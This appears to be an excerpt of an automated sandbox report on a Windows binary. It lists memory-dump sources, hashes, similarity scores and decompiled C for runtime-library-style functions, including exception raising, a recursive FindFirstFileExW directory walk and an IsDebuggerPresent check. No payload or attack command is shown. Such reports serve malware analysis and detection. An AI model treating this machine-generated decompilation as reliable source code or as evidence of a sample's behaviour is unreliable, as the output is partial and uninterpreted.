0x00421683
0x00421695
0x00421695
0x00421665
0x00421656
0x00421645

APIs

__aulldvrm.LIBCMT ref: 0042170A
__aulldvrm.LIBCMT ref: 004218CA

Memory Dump Source

Source File: 00000005.00000001.1669075870.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000001.1668983266.00400000.00000002.sdmp Download File
Associated: 00000005.00000001.1670705928.00437000.00000002.sdmp Download File
Associated: 00000005.00000001.1670872174.0044A000.00000008.sdmp Download File
Associated: 00000005.00000001.1670885737.0044B000.00000004.sdmp Download File
Associated: 00000005.00000001.1670906384.00450000.00000008.sdmp Download File
Associated: 00000005.00000001.1670915612.00451000.00000002.sdmp Download File

Similarity

API ID: __aulldvrm
String ID:
API String ID: 1302938615-0
Opcode ID: 8b966175d36527086055a8eaef327bce19bcb63a78831725ef92ca2874a5e152
Instruction ID: 01d0c863f36c2e3b9ae41960f7098a9d41eac2e13cae58fd6d3629f8b4200c19
Opcode Fuzzy Hash: 8b966175d36527086055a8eaef327bce19bcb63a78831725ef92ca2874a5e152
Instruction Fuzzy Hash: 28026D71E012299FDF14CFA8D8806AEB7F1FF98314F55826AD819A7350D735AE41CB84

Uniqueness

Uniqueness Score: 0.08%

Function 00421620, Relevance: 3.5, APIs: 2, Instructions: 452COMMON

Download Yara Rule

APIs

__aulldvrm.LIBCMT ref: 0042170A
__aulldvrm.LIBCMT ref: 004218CA

Memory Dump Source

Source File: 00000005.00000002.1855766825.0041B000.00000020.sdmp, Offset: 0041B000, based on PE: false

Similarity

API ID: __aulldvrm
String ID:
API String ID: 1302938615-0
Opcode ID: b31528426470e16d42bc36fd1c977d352fe3c479e6c6ecf0634b3bf483c339b4
Instruction ID: 01d0c863f36c2e3b9ae41960f7098a9d41eac2e13cae58fd6d3629f8b4200c19
Opcode Fuzzy Hash: b31528426470e16d42bc36fd1c977d352fe3c479e6c6ecf0634b3bf483c339b4
Instruction Fuzzy Hash: 28026D71E012299FDF14CFA8D8806AEB7F1FF98314F55826AD819A7350D735AE41CB84

Uniqueness

Uniqueness Score: 0.08%

Function 00415EBC, Relevance: 3.4, Strings: 2, Instructions: 908UNIQUE

Download Yara Rule

Strings

3=4+, xrefs: 00415FE7
m]HS, xrefs: 00415FFD

Memory Dump Source

Source File: 00000005.00000002.1855736795.00413000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.1855692711.00400000.00000002.sdmp Download File
Associated: 00000005.00000002.1855704108.00401000.00000020.sdmp Download File
Associated: 00000005.00000002.1855724332.00411000.00000002.sdmp Download File
Associated: 00000005.00000002.1855752485.0041A000.00000002.sdmp Download File

Similarity

API ID:
String ID: 3=4+$m]HS
API String ID: 0-2375091227
Opcode ID: a133b962ad87c0ce630fac112958a9f257c9d034a4ffb0e7ab6236a91f936808
Instruction ID: a879f0590fd0db7b1c63f9b84e1414f280698b9219d8cf2d46c7681815a7daf2
Opcode Fuzzy Hash: a133b962ad87c0ce630fac112958a9f257c9d034a4ffb0e7ab6236a91f936808
Instruction Fuzzy Hash: 7BE1513A48E7D05EC7939B3684A16853F50DE57E20B0F25DFC4C04F123E616998DC7A9

Uniqueness

Uniqueness Score: 100.00%

Function 0042959E, Relevance: 3.1, APIs: 2, Instructions: 55UNIQUE

Download Yara Rule

APIs

IsDebuggerPresent.KERNEL32(?,?,?,0041F614,?,0043BFE0,00012012,?,00000240,?,?,?,?), ref: 00429527
OutputDebugStringW.KERNEL32(?,?,0041F614,?,0043BFE0,00012012,?,00000240,?,?,?,?), ref: 0042953E

Memory Dump Source

Source File: 00000005.00000002.1855766825.0041B000.00000020.sdmp, Offset: 0041B000, based on PE: false

Similarity

API ID: DebugDebuggerOutputPresentString
String ID:
API String ID: 4086329628-0
Opcode ID: a6f65a8f90cec53a8a62f22b12185936e487ff4a8f96c889cdf951ce0fe6fe69
Instruction ID: 7a3316b5fe6a12af30829701f7c449eef0285d197c395d7ad7fb3a6ce1a5bf00
Opcode Fuzzy Hash: a6f65a8f90cec53a8a62f22b12185936e487ff4a8f96c889cdf951ce0fe6fe69
Instruction Fuzzy Hash: A501D4733041347AAB322F52BC01B7F37599F05364F940047F90886252CA39DD91A5BE

Uniqueness

Uniqueness Score: 100.00%

Function 004234BD, Relevance: 1.8, APIs: 1, Instructions: 274
COMMONCrypto

Download Yara Rule

C-Code - Quality: 100%

			E004234BD(long _a4, signed int* _a8, signed char _a12, signed int _a16, intOrPtr* _a20, unsigned int* _a24, intOrPtr _a28) {
				signed int _t172;
				signed int _t175;
				signed int _t178;
				signed int* _t179;
				signed char _t193;
				signed int _t196;
				signed int _t200;
				signed int _t203;
				void* _t204;
				void* _t207;
				signed int _t210;
				void* _t211;
				signed int _t226;
				unsigned int* _t241;
				signed char _t243;
				signed int* _t251;
				unsigned int* _t257;
				signed int* _t258;
				signed char _t260;
				long _t263;
				signed int* _t266;

				 *(_a4 + 4) = 0;
				_t263 = 0xc000000d;
				 *(_a4 + 8) = 0;
				 *(_a4 + 0xc) = 0;
				_t243 = _a12;
				if((_t243 & 0x00000010) != 0) {
					_t263 = 0xc000008f;
					 *(_a4 + 4) =  *(_a4 + 4) | 1;
				}
				if((_t243 & 0x00000002) != 0) {
					_t263 = 0xc0000093;
					 *(_a4 + 4) =  *(_a4 + 4) | 0x00000002;
				}
				if((_t243 & 0x00000001) != 0) {
					_t263 = 0xc0000091;
					 *(_a4 + 4) =  *(_a4 + 4) | 0x00000004;
				}
				if((_t243 & 0x00000004) != 0) {
					_t263 = 0xc000008e;
					 *(_a4 + 4) =  *(_a4 + 4) | 0x00000008;
				}
				if((_t243 & 0x00000008) != 0) {
					_t263 = 0xc0000090;
					 *(_a4 + 4) =  *(_a4 + 4) | 0x00000010;
				}
				_t266 = _a8;
				 *(_a4 + 8) =  *(_a4 + 8) ^ ( !( *_t266 << 4) ^  *(_a4 + 8)) & 0x00000010;
				 *(_a4 + 8) =  *(_a4 + 8) ^ ( !( *_t266 +  *_t266) ^  *(_a4 + 8)) & 0x00000008;
				 *(_a4 + 8) =  *(_a4 + 8) ^ ( !( *_t266 >> 1) ^  *(_a4 + 8)) & 0x00000004;
				 *(_a4 + 8) =  *(_a4 + 8) ^ ( !( *_t266 >> 3) ^  *(_a4 + 8)) & 0x00000002;
				 *(_a4 + 8) =  *(_a4 + 8) ^ ( !( *_t266 >> 5) ^  *(_a4 + 8)) & 1;
				_t260 = E00425826(_a4);
				if((_t260 & 0x00000001) != 0) {
					 *(_a4 + 0xc) =  *(_a4 + 0xc) | 0x00000010;
				}
				if((_t260 & 0x00000004) != 0) {
					 *(_a4 + 0xc) =  *(_a4 + 0xc) | 0x00000008;
				}
				if((_t260 & 0x00000008) != 0) {
					 *(_a4 + 0xc) =  *(_a4 + 0xc) | 0x00000004;
				}
				if((_t260 & 0x00000010) != 0) {
					 *(_a4 + 0xc) =  *(_a4 + 0xc) | 0x00000002;
				}
				if((_t260 & 0x00000020) != 0) {
					 *(_a4 + 0xc) =  *(_a4 + 0xc) | 1;
				}
				_t172 =  *_t266 & 0x00000c00;
				if(_t172 == 0) {
					 *_a4 =  *_a4 & 0xfffffffc;
				} else {
					if(_t172 == 0x400) {
						_t258 = _a4;
						_t226 =  *_t258 & 0xfffffffd | 1;
						L26:
						 *_t258 = _t226;
						L29:
						_t175 =  *_t266 & 0x00000300;
						if(_t175 == 0) {
							_t251 = _a4;
							_t178 =  *_t251 & 0xffffffeb | 0x00000008;
							L35:
							 *_t251 = _t178;
							L36:
							_t179 = _a4;
							_t255 = (_a16 << 0x00000005 ^  *_t179) & 0x0001ffe0;
							 *_t179 =  *_t179 ^ (_a16 << 0x00000005 ^  *_t179) & 0x0001ffe0;
							 *(_a4 + 0x20) =  *(_a4 + 0x20) | 1;
							if(_a28 == 0) {
								 *(_a4 + 0x20) =  *(_a4 + 0x20) & 0xffffffe3 | 0x00000002;
								 *((long long*)(_a4 + 0x10)) =  *_a20;
								 *(_a4 + 0x60) =  *(_a4 + 0x60) | 1;
								_t255 = _a4;
								_t241 = _a24;
								 *(_a4 + 0x60) =  *(_a4 + 0x60) & 0xffffffe3 | 0x00000002;
								 *(_a4 + 0x50) =  *_t241;
							} else {
								 *(_a4 + 0x20) =  *(_a4 + 0x20) & 0xffffffe1;
								 *((intOrPtr*)(_a4 + 0x10)) =  *_a20;
								 *(_a4 + 0x60) =  *(_a4 + 0x60) | 1;
								_t241 = _a24;
								 *(_a4 + 0x60) =  *(_a4 + 0x60) & 0xffffffe1;
								 *(_a4 + 0x50) =  *_t241;
							}
							E0042578C(_t255);
							RaiseException(_t263, 0, 1,  &_a4);
							_t257 = _a4;
							_t193 = _t257[2];
							if((_t193 & 0x00000010) != 0) {
								 *_t266 =  *_t266 & 0xfffffffe;
								_t193 = _t257[2];
							}
							if((_t193 & 0x00000008) != 0) {
								 *_t266 =  *_t266 & 0xfffffffb;
								_t193 = _t257[2];
							}
							if((_t193 & 0x00000004) != 0) {
								 *_t266 =  *_t266 & 0xfffffff7;
								_t193 = _t257[2];
							}
							if((_t193 & 0x00000002) != 0) {
								 *_t266 =  *_t266 & 0xffffffef;
								_t193 = _t257[2];
							}
							if((_t193 & 0x00000001) != 0) {
								 *_t266 =  *_t266 & 0xffffffdf;
							}
							_t196 =  *_t257 & 0x00000003;
							if(_t196 == 0) {
								 *_t266 =  *_t266 & 0xfffff3ff;
							} else {
								_t207 = _t196 - 1;
								if(_t207 == 0) {
									_t210 =  *_t266 & 0xfffff7ff | 0x00000400;
									L55:
									 *_t266 = _t210;
									L58:
									_t200 =  *_t257 >> 0x00000002 & 0x00000007;
									if(_t200 == 0) {
										_t203 =  *_t266 & 0xfffff3ff | 0x00000300;
										L64:
										 *_t266 = _t203;
										L65:
										if(_a28 == 0) {
											 *_t241 = _t257[0x14];
										} else {
											 *_t241 = _t257[0x14];
										}
										return _t203;
									}
									_t204 = _t200 - 1;
									if(_t204 == 0) {
										_t203 =  *_t266 & 0xfffff3ff | 0x00000200;
										goto L64;
									}
									_t203 = _t204 - 1;
									if(_t203 == 0) {
										 *_t266 =  *_t266 & 0xfffff3ff;
									}
									goto L65;
								}
								_t211 = _t207 - 1;
								if(_t211 == 0) {
									_t210 =  *_t266 & 0xfffffbff | 0x00000800;
									goto L55;
								}
								if(_t211 == 1) {
									 *_t266 =  *_t266 | 0x00000c00;
								}
							}
							goto L58;
						}
						if(_t175 == 0x200) {
							_t251 = _a4;
							_t178 =  *_t251 & 0xffffffe7 | 0x00000004;
							goto L35;
						}
						if(_t175 == 0x300) {
							 *_a4 =  *_a4 & 0xffffffe3;
						}
						goto L36;
					}
					if(_t172 == 0x800) {
						_t258 = _a4;
						_t226 =  *_t258 & 0xfffffffe | 0x00000002;
						goto L26;
					}
					if(_t172 == 0xc00) {
						 *_a4 =  *_a4 | 0x00000003;
					}
				}
			}

0x004234cb
0x004234d2
0x004234d7
0x004234dd
0x004234e0
0x004234e6
0x004234eb
0x004234f0
0x004234f0
0x004234f6
0x004234fb
0x00423500
0x00423500
0x00423507
0x0042350c
0x00423511
0x00423511
0x00423518
0x0042351d
0x00423522
0x00423522
0x00423529
0x0042352e
0x00423533
0x00423533
0x0042353b
0x0042354b
0x0042355d
0x0042356f
0x00423582
0x00423594
0x0042359c
0x004235a1
0x004235a6
0x004235a6
0x004235ad
0x004235b2
0x004235b2
0x004235b9
0x004235be
0x004235be
0x004235c5
0x004235ca
0x004235ca
0x004235d1
0x004235d6
0x004235d6
0x004235e0
0x004235e2
0x0042361c
0x004235e4
0x004235e9
0x0042360d
0x00423615
0x00423609
0x00423609
0x0042361f
0x00423626
0x00423628
0x0042364a
0x00423652
0x00423655
0x00423655
0x00423657
0x00423657
0x00423662
0x00423668
0x0042366d
0x00423674
0x004236ae
0x004236b9
0x004236bf
0x004236c2
0x004236c5
0x004236d1
0x004236d9
0x00423676
0x00423679
0x00423685
0x0042368b
0x00423691
0x00423694
0x0042369d
0x0042369d
0x004236dc
0x004236ea
0x004236f0
0x004236f3
0x004236f8
0x004236fa
0x004236fd
0x004236fd
0x00423702
0x00423704
0x00423707
0x00423707
0x0042370c
0x0042370e
0x00423711
0x00423711
0x00423716
0x00423718
0x0042371b
0x0042371b
0x00423720
0x00423722
0x00423722
0x0042372f
0x00423732
0x00423769
0x00423734
0x00423734
0x00423737
0x00423762
0x00423757
0x00423757
0x0042376b
0x00423773
0x00423776
0x00423795
0x0042379a
0x0042379a
0x0042379c
0x004237a1
0x004237ad
0x004237a3
0x004237a6
0x004237a6
0x004237b2
0x004237b2
0x00423778
0x0042377b
0x0042378a
0x00000000
0x0042378a
0x0042377d
0x00423780
0x00423782
0x00423782
0x00000000
0x00423780
0x00423739
0x0042373c
0x00423752
0x00000000
0x00423752
0x00423741
0x00423743
0x00423743
0x00423741
0x00000000
0x00423732
0x0042362f
0x0042363d
0x00423645
0x00000000
0x00423645
0x00423633
0x00423638
0x00423638
0x00000000
0x00423633
0x004235f0
0x004235fe
0x00423606
0x00000000
0x00423606
0x004235f4
0x004235f9
0x004235f9
0x004235f4

APIs

RaiseException.KERNEL32(C000000D,00000000,00000001,00000008,?,00000008,?,?,004234B8,00000008,?,00000008,?,?,00434602,00000000), ref: 004236EA

Memory Dump Source

Source File: 00000005.00000001.1669075870.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000001.1668983266.00400000.00000002.sdmp Download File
Associated: 00000005.00000001.1670705928.00437000.00000002.sdmp Download File
Associated: 00000005.00000001.1670872174.0044A000.00000008.sdmp Download File
Associated: 00000005.00000001.1670885737.0044B000.00000004.sdmp Download File
Associated: 00000005.00000001.1670906384.00450000.00000008.sdmp Download File
Associated: 00000005.00000001.1670915612.00451000.00000002.sdmp Download File

Similarity

API ID: ExceptionRaise
String ID:
API String ID: 3997070919-0
Opcode ID: 8392e5e7f4667177c50a1cf567c19782afe3a0df0254a66a314f66e631c1fe50
Instruction ID: 654e2e458ebe40eeeeba695690f3e2ef975acb57691169321bcce09c8153e090
Opcode Fuzzy Hash: 8392e5e7f4667177c50a1cf567c19782afe3a0df0254a66a314f66e631c1fe50
Instruction Fuzzy Hash: 2DB18D71210614DFDB14CF28D486B557BB0FF44365F658659E89ACF3A1C339EA82CB44

Uniqueness

Uniqueness Score: 0.05%

Function 004234BD, Relevance: 1.8, APIs: 1, Instructions: 274COMMON

Download Yara Rule

APIs

RaiseException.KERNEL32(C000000D,00000000,00000001,?,?,00000008,?,?,004234B8,?,?,00000008,?,?,00434602,00000000), ref: 004236EA

Memory Dump Source

Source File: 00000005.00000002.1855766825.0041B000.00000020.sdmp, Offset: 0041B000, based on PE: false

Similarity

API ID: ExceptionRaise
String ID:
API String ID: 3997070919-0
Opcode ID: 8392e5e7f4667177c50a1cf567c19782afe3a0df0254a66a314f66e631c1fe50
Instruction ID: 654e2e458ebe40eeeeba695690f3e2ef975acb57691169321bcce09c8153e090
Opcode Fuzzy Hash: 8392e5e7f4667177c50a1cf567c19782afe3a0df0254a66a314f66e631c1fe50
Instruction Fuzzy Hash: 2DB18D71210614DFDB14CF28D486B557BB0FF44365F658659E89ACF3A1C339EA82CB44

Uniqueness

Uniqueness Score: 0.05%

Function 0042C8FB, Relevance: 1.6, APIs: 1, Instructions: 140
COMMON

Download Yara Rule

C-Code - Quality: 80%

			E0042C8FB(void* __ecx, void* __esi, intOrPtr* _a4, intOrPtr _a8, signed int _a12, intOrPtr* _a16) {
				signed int _v8;
				signed int _v12;
				union _FINDEX_INFO_LEVELS _v28;
				intOrPtr* _v32;
				intOrPtr _v36;
				signed int _v48;
				struct _WIN32_FIND_DATAW _v604;
				char _v605;
				intOrPtr* _v612;
				union _FINDEX_INFO_LEVELS _v616;
				union _FINDEX_INFO_LEVELS _v620;
				union _FINDEX_INFO_LEVELS _v624;
				signed int _v628;
				union _FINDEX_INFO_LEVELS _v632;
				union _FINDEX_INFO_LEVELS _v636;
				signed int _v640;
				signed int _v644;
				union _FINDEX_INFO_LEVELS _v648;
				union _FINDEX_INFO_LEVELS _v652;
				union _FINDEX_INFO_LEVELS _v656;
				union _FINDEX_INFO_LEVELS _v660;
				signed int _v664;
				union _FINDEX_INFO_LEVELS _v668;
				union _FINDEX_INFO_LEVELS _v672;
				intOrPtr _t68;
				signed int _t73;
				signed int _t75;
				char _t77;
				signed char _t78;
				signed int _t84;
				signed int _t94;
				signed int _t97;
				union _FINDEX_INFO_LEVELS _t98;
				union _FINDEX_INFO_LEVELS _t100;
				intOrPtr* _t105;
				signed int _t108;
				intOrPtr _t115;
				signed int _t117;
				signed int _t120;
				signed int _t122;
				void* _t125;
				union _FINDEX_INFO_LEVELS _t126;
				intOrPtr* _t129;
				intOrPtr* _t132;
				signed int _t134;
				intOrPtr* _t137;
				signed int _t142;
				signed int _t148;
				void* _t154;
				void* _t155;
				signed int _t158;
				intOrPtr _t160;
				void* _t165;
				void* _t166;
				signed int _t168;
				signed int _t171;
				void* _t172;
				signed int _t173;
				void* _t174;
				void* _t175;

				_push(__ecx);
				_t132 = _a4;
				_t2 = _t132 + 1; // 0x1
				_t154 = _t2;
				do {
					_t68 =  *_t132;
					_t132 = _t132 + 1;
				} while (_t68 != 0);
				_t158 = _a12;
				_t134 = _t132 - _t154 + 1;
				_v8 = _t134;
				if(_t134 <=  !_t158) {
					_push(__esi);
					_t5 = _t158 + 1; // 0x1
					_t125 = _t5 + _t134;
					_t165 = E00420EFE(_t125, 1);
					__eflags = _t158;
					if(_t158 == 0) {
						L7:
						_push(_v8);
						_t125 = _t125 - _t158;
						_t73 = E004331AA(_t165 + _t158, _t125, _a4);
						_t173 = _t172 + 0x10;
						__eflags = _t73;
						if(_t73 != 0) {
							goto L12;
						} else {
							_t129 = _a16;
							_t117 = E0042CC5D(_t129);
							_v8 = _t117;
							__eflags = _t117;
							if(_t117 == 0) {
								 *( *(_t129 + 4)) = _t165;
								_t168 = 0;
								_t14 = _t129 + 4;
								 *_t14 =  *(_t129 + 4) + 4;
								__eflags =  *_t14;
							} else {
								E004214E2(_t165);
								_t168 = _v8;
							}
							E004214E2(0);
							_t120 = _t168;
							goto L4;
						}
					} else {
						_push(_t158);
						_t122 = E004331AA(_t165, _t125, _a8);
						_t173 = _t172 + 0x10;
						__eflags = _t122;
						if(_t122 != 0) {
							L12:
							_push(0);
							_push(0);
							_push(0);
							_push(0);
							_push(0);
							E0041A842();
							asm("int3");
							_t171 = _t173;
							_t174 = _t173 - 0x298;
							_t75 =  *0x44b6b4; // 0x4a5cc10f
							_v48 = _t75 ^ _t171;
							_t137 = _v32;
							_t155 = _v28;
							_push(_t125);
							_push(0);
							_t160 = _v36;
							_v648 = _t155;
							__eflags = _t137 - _t160;
							if(_t137 != _t160) {
								while(1) {
									_t115 =  *_t137;
									__eflags = _t115 - 0x2f;
									if(_t115 == 0x2f) {
										break;
									}
									__eflags = _t115 - 0x5c;
									if(_t115 != 0x5c) {
										__eflags = _t115 - 0x3a;
										if(_t115 != 0x3a) {
											_t137 = E00434BF0(_t160, _t137);
											__eflags = _t137 - _t160;
											if(_t137 != _t160) {
												continue;
											}
										}
									}
									break;
								}
								_t155 = _v612;
							}
							_t77 =  *_t137;
							_v605 = _t77;
							__eflags = _t77 - 0x3a;
							if(_t77 != 0x3a) {
								L23:
								_t126 = 0;
								__eflags = _t77 - 0x2f;
								if(__eflags == 0) {
									L26:
									_t78 = 1;
								} else {
									__eflags = _t77 - 0x5c;
									if(__eflags == 0) {
										goto L26;
									} else {
										__eflags = _t77 - 0x3a;
										_t78 = 0;
										if(__eflags == 0) {
											goto L26;
										}
									}
								}
								_v672 = _t126;
								_v668 = _t126;
								_push(_t165);
								asm("sbb eax, eax");
								_v664 = _t126;
								_v660 = _t126;
								_v640 =  ~(_t78 & 0x000000ff) & _t137 - _t160 + 0x00000001;
								_v656 = _t126;
								_v652 = _t126;
								_t84 = E004220F1(_t137 - _t160 + 1, _t160,  &_v672, E0042943C(_t155, __eflags));
								_t175 = _t174 + 0xc;
								asm("sbb eax, eax");
								_t166 = FindFirstFileExW( !( ~_t84) & _v664, _t126,  &_v604, _t126, _t126, _t126);
								__eflags = _t166 - 0xffffffff;
								if(_t166 != 0xffffffff) {
									_t142 =  *((intOrPtr*)(_v612 + 4)) -  *_v612;
									__eflags = _t142;
									_t143 = _t142 >> 2;
									_v644 = _t142 >> 2;
									do {
										_v636 = _t126;
										_v632 = _t126;
										_v628 = _t126;
										_v624 = _t126;
										_v620 = _t126;
										_v616 = _t126;
										_t94 = E0042C63B( &(_v604.cFileName),  &_v636,  &_v605, E0042943C(_t155, __eflags));
										_t175 = _t175 + 0x10;
										asm("sbb eax, eax");
										_t97 =  !( ~_t94) & _v628;
										__eflags =  *_t97 - 0x2e;
										if( *_t97 != 0x2e) {
											L34:
											_push(_v612);
											_t98 = E0042C8FB(_t143, _t166, _t97, _t160, _v640);
											_t175 = _t175 + 0x10;
											_v648 = _t98;
											__eflags = _t98;
											if(_t98 != 0) {
												__eflags = _v616 - _t126;
												if(_v616 != _t126) {
													E004214E2(_v628);
													_t98 = _v648;
												}
												_t126 = _t98;
											} else {
												goto L35;
											}
										} else {
											_t143 =  *((intOrPtr*)(_t97 + 1));
											__eflags = _t143;
											if(_t143 == 0) {
												goto L35;
											} else {
												__eflags = _t143 - 0x2e;
												if(_t143 != 0x2e) {
													goto L34;
												} else {
													__eflags =  *((intOrPtr*)(_t97 + 2)) - _t126;
													if( *((intOrPtr*)(_t97 + 2)) == _t126) {
														goto L35;
													} else {
														goto L34;
													}
												}
											}
										}
										L43:
										FindClose(_t166);
										goto L44;
										L35:
										__eflags = _v616 - _t126;
										if(_v616 != _t126) {
											E004214E2(_v628);
											_pop(_t143);
										}
										__eflags = FindNextFileW(_t166,  &_v604);
									} while (__eflags != 0);
									_t105 = _v612;
									_t148 = _v644;
									_t156 =  *_t105;
									_t108 =  *((intOrPtr*)(_t105 + 4)) -  *_t105 >> 2;
									__eflags = _t148 - _t108;
									if(_t148 != _t108) {
										E00434760(_t156 + _t148 * 4, _t108 - _t148, 4, E0042C623);
									}
									goto L43;
								} else {
									_push(_v612);
									_t126 = E0042C8FB( &_v604, _t166, _t160, _t126, _t126);
								}
								L44:
								__eflags = _v652;
								if(_v652 != 0) {
									E004214E2(_v664);
								}
								_t100 = _t126;
							} else {
								__eflags = _t137 - _t160 + 1;
								if(_t137 == _t160 + 1) {
									_t77 = _v605;
									goto L23;
								} else {
									_push(_t155);
									_t100 = E0042C8FB(_t137, _t165, _t160, 0, 0);
								}
							}
							__eflags = _v12 ^ _t171;
							E00415A87();
							return _t100;
						} else {
							goto L7;
						}
					}
				} else {
					_t120 = 0xc;
					L4:
					return _t120;
				}
			}

0x0042c900
0x0042c901
0x0042c904
0x0042c904
0x0042c907
0x0042c907
0x0042c909
0x0042c90a
0x0042c90f
0x0042c916
0x0042c919
0x0042c91e
0x0042c929
0x0042c92a
0x0042c92d
0x0042c937
0x0042c93b
0x0042c93d
0x0042c951
0x0042c951
0x0042c954
0x0042c95e
0x0042c963
0x0042c966
0x0042c968
0x00000000
0x0042c96a
0x0042c96a
0x0042c96f
0x0042c976
0x0042c979
0x0042c97b
0x0042c98c
0x0042c98e
0x0042c990
0x0042c990
0x0042c990
0x0042c97d
0x0042c97e
0x0042c983
0x0042c986
0x0042c995
0x0042c99b
0x00000000
0x0042c99e
0x0042c93f
0x0042c93f
0x0042c945
0x0042c94a
0x0042c94d
0x0042c94f
0x0042c9a1
0x0042c9a3
0x0042c9a4
0x0042c9a5
0x0042c9a6
0x0042c9a7
0x0042c9a8
0x0042c9ad
0x0042c9b1
0x0042c9b3
0x0042c9b9
0x0042c9c0
0x0042c9c3
0x0042c9c6
0x0042c9c9
0x0042c9ca
0x0042c9cb
0x0042c9ce
0x0042c9d4
0x0042c9d6
0x0042c9d8
0x0042c9d8
0x0042c9da
0x0042c9dc
0x00000000
0x00000000
0x0042c9de
0x0042c9e0
0x0042c9e2
0x0042c9e4
0x0042c9ef
0x0042c9f1
0x0042c9f3
0x00000000
0x00000000
0x0042c9f3
0x0042c9e4
0x00000000
0x0042c9e0
0x0042c9f5
0x0042c9f5
0x0042c9fb
0x0042c9fd
0x0042ca03
0x0042ca05
0x0042ca27
0x0042ca27
0x0042ca29
0x0042ca2b
0x0042ca37
0x0042ca37
0x0042ca2d
0x0042ca2d
0x0042ca2f
0x00000000
0x0042ca31
0x0042ca31
0x0042ca33
0x0042ca35
0x00000000
0x00000000
0x0042ca35
0x0042ca2f
0x0042ca3f
0x0042ca47
0x0042ca4d
0x0042ca4e
0x0042ca50
0x0042ca58
0x0042ca5e
0x0042ca64
0x0042ca6a
0x0042ca7e
0x0042ca83
0x0042ca8e
0x0042caa4
0x0042caa6
0x0042caa9
0x0042cacc
0x0042cacc
0x0042cace
0x0042cad1
0x0042cad7
0x0042cad7
0x0042cadd
0x0042cae3
0x0042cae9
0x0042caef
0x0042caf5
0x0042cb16
0x0042cb1b
0x0042cb20
0x0042cb24
0x0042cb2a
0x0042cb2d
0x0042cb40
0x0042cb40
0x0042cb4e
0x0042cb53
0x0042cb56
0x0042cb5c
0x0042cb5e
0x0042cbbc
0x0042cbc2
0x0042cbca
0x0042cbcf
0x0042cbd5
0x0042cbd6
0x00000000
0x00000000
0x00000000
0x0042cb2f
0x0042cb2f
0x0042cb32
0x0042cb34
0x00000000
0x0042cb36
0x0042cb36
0x0042cb39
0x00000000
0x0042cb3b
0x0042cb3b
0x0042cb3e
0x00000000
0x00000000
0x00000000
0x00000000
0x0042cb3e
0x0042cb39
0x0042cb34
0x0042cbd8
0x0042cbd9
0x00000000
0x0042cb60
0x0042cb60
0x0042cb66
0x0042cb6e
0x0042cb73
0x0042cb73
0x0042cb82
0x0042cb82
0x0042cb8a
0x0042cb90
0x0042cb96
0x0042cb9d
0x0042cba0
0x0042cba2
0x0042cbb2
0x0042cbb7
0x00000000
0x0042caab
0x0042caab
0x0042cabc
0x0042cabc
0x0042cbdf
0x0042cbdf
0x0042cbe7
0x0042cbef
0x0042cbf4
0x0042cbf5
0x0042ca07
0x0042ca0a
0x0042ca0c
0x0042ca21
0x00000000
0x0042ca0e
0x0042ca0e
0x0042ca14
0x0042ca19
0x0042ca0c
0x0042cbfb
0x0042cbfe
0x0042cc06
0x00000000
0x00000000
0x00000000
0x0042c94f
0x0042c920
0x0042c922
0x0042c923
0x0042c927
0x0042c927

APIs

Part of subcall function 00420EFE: RtlAllocateHeap.NTDLL(00000008,?,00000000,?,00425351,00000001,00000364,00000005,000000FF,?,00416C35,?,?,1FFFFFFF,00000008), ref: 00420F3F

Part of subcall function 0041A842: IsProcessorFeaturePresent.KERNEL32(00000017), ref: 0041A844
Part of subcall function 0041A842: GetCurrentProcess.KERNEL32(C0000417,?,0041370C), ref: 0041A867
Part of subcall function 0041A842: TerminateProcess.KERNEL32(00000000,?,0041370C), ref: 0041A86E

FindFirstFileExW.KERNEL32(?,00000000,?,00000000,00000000,00000000,00000000,00000000,00000001), ref: 0042CA9E

Part of subcall function 0042C63B: GetLastError.KERNEL32 ref: 0042C6A3
Part of subcall function 0042C63B: __dosmaperr.LIBCMT ref: 0042C6AA
Part of subcall function 0042C63B: GetLastError.KERNEL32(?,?,?,?,?,?,?), ref: 0042C6E9
Part of subcall function 0042C63B: __dosmaperr.LIBCMT ref: 0042C6F0

Memory Dump Source

Source File: 00000005.00000001.1669075870.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000001.1668983266.00400000.00000002.sdmp Download File
Associated: 00000005.00000001.1670705928.00437000.00000002.sdmp Download File
Associated: 00000005.00000001.1670872174.0044A000.00000008.sdmp Download File
Associated: 00000005.00000001.1670885737.0044B000.00000004.sdmp Download File
Associated: 00000005.00000001.1670906384.00450000.00000008.sdmp Download File
Associated: 00000005.00000001.1670915612.00451000.00000002.sdmp Download File

Similarity

API ID: ErrorLastProcess__dosmaperr$AllocateCurrentFeatureFileFindFirstHeapPresentProcessorTerminate
String ID:
API String ID: 2157014762-0
Opcode ID: 96fdcbc17086240260ee8aab73345db0abf12d8466dd4453c5c9c66668720f71
Instruction ID: 0a2e29bacb73315646be8fcec53fcdefe0e53a8da335f83819fd89e95edee9b3
Opcode Fuzzy Hash: 96fdcbc17086240260ee8aab73345db0abf12d8466dd4453c5c9c66668720f71
Instruction Fuzzy Hash: 2141A4B190422CAEDF20DF69DC89AAEBBB8AF45304F5442DEE44DD3211DA349E818F54

Uniqueness

Uniqueness Score: 0.41%

Function 0042C8FB, Relevance: 1.6, APIs: 1, Instructions: 140COMMON

Download Yara Rule

APIs

Part of subcall function 00420EFE: RtlAllocateHeap.NTDLL(00000008,?,00000000), ref: 00420F3F

FindFirstFileExW.KERNEL32(?,00000000,?,00000000,00000000,00000000,00000000,00000000,?), ref: 0042CA9E

Part of subcall function 0042C63B: GetLastError.KERNEL32 ref: 0042C6A3
Part of subcall function 0042C63B: GetLastError.KERNEL32(?,?,?,?,?,?,?), ref: 0042C6E9

Memory Dump Source

Source File: 00000005.00000002.1855766825.0041B000.00000020.sdmp, Offset: 0041B000, based on PE: false

Similarity

API ID: ErrorLast$AllocateFileFindFirstHeap
String ID:
API String ID: 3461260380-0
Opcode ID: 5a03bfddbac28c1417c41e4a2a806c432cef228037411ebda4357084ab13f169
Instruction ID: 0a2e29bacb73315646be8fcec53fcdefe0e53a8da335f83819fd89e95edee9b3
Opcode Fuzzy Hash: 5a03bfddbac28c1417c41e4a2a806c432cef228037411ebda4357084ab13f169
Instruction Fuzzy Hash: 2141A4B190422CAEDF20DF69DC89AAEBBB8AF45304F5442DEE44DD3211DA349E818F54

Uniqueness

Uniqueness Score: 0.41%

Function 00415CB5, Relevance: 1.6, APIs: 1, Instructions: 132
COMMON

Download Yara Rule

